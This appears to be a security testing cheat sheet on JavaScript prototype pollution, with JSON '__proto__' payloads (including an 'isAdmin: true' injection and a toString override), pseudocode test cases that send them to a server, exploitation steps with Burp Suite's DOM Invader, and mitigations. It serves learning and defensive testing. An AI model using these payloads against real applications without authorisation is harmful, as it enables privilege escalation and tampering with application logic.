Prototype Pollution

Description

Prototype Pollution occurs when an attacker can inject properties into the prototype of an object, leading to unintended behavior or security vulnerabilities. This type of attack can affect applications that extend or manipulate JavaScript objects.

Example with Scenario

Scenario: A web application uses user input to create new object properties. An attacker can manipulate the input to modify the prototype of built-in objects, potentially executing arbitrary code or altering application logic.

Payloads and Test Cases

Payloads

1. Adding a Property:

   Copy

   {
     "__proto__": {
       "isAdmin": true
     }
   }

2. Modifying an Existing Property:

   Copy

   {
     "__proto__": {
       "toString": "function() { return 'hacked'; }"
     }
   }

3. Nested Property Injection:

   Copy

   {
     "__proto__": {
       "nested": {
         "polluted": "yes"
       }
     }
   }

Test Cases

1. Adding a Property:

   • Payload:

     Copy

     {
       "__proto__": {
         "isAdmin": true
       }
     }

   • Test Case:

     Copy

     // Send payload to the server
     sendPayloadToServer({
       "__proto__": {
         "isAdmin": true
       }
     });
     // Verify if the application processes the injected property
     checkIfAdminPrivilegesGranted();

2. Modifying an Existing Property:

   • Payload:

     Copy

     {
       "__proto__": {
         "toString": "function() { return 'hacked'; }"
       }
     }

   • Test Case:

     Copy

     // Send payload to the server
     sendPayloadToServer({
       "__proto__": {
         "toString": "function() { return 'hacked'; }"
       }
     });
     // Verify if the application uses the modified toString method
     checkToStringMethod("hacked");

3. Nested Property Injection:

   • Payload:

     Copy

     {
       "__proto__": {
         "nested": {
           "polluted": "yes"
         }
       }
     }

   • Test Case:

     Copy

     // Send payload to the server
     sendPayloadToServer({
       "__proto__": {
         "nested": {
           "polluted": "yes"
         }
       }
     });
     // Verify if the application recognizes the nested polluted property
     checkNestedProperty("nested.polluted", "yes");

Detection and Exploitation with DOM Invader

1. Detection:

   • Use Burp Suite's DOM Invader tool to identify vulnerable spots in the application.

   • Look for points where user input directly influences object properties or prototype chains.

2. Exploitation:

   • Use the identified injection points to craft malicious payloads that modify object prototypes.

   • Test the payloads to see if they lead to security vulnerabilities or application logic changes.

Mitigation

1. Input Validation:

   • Validate and sanitize user input to ensure it does not contain malicious characters.

   • Reject input that attempts to modify object prototypes (e.g., containing __proto__, constructor, prototype).

2. Use Object.create(null):

   • Use Object.create(null) to create objects without a prototype.

   • Avoid extending or modifying native object prototypes.

3. Deep Clone Objects:

   • Use deep cloning techniques to prevent prototype pollution when merging objects.

   • Implement secure methods for object manipulation.

4. Security Libraries:

   • Use security libraries and frameworks that provide built-in protection against prototype pollution.

   • Enable and configure security features to prevent injection vulnerabilities.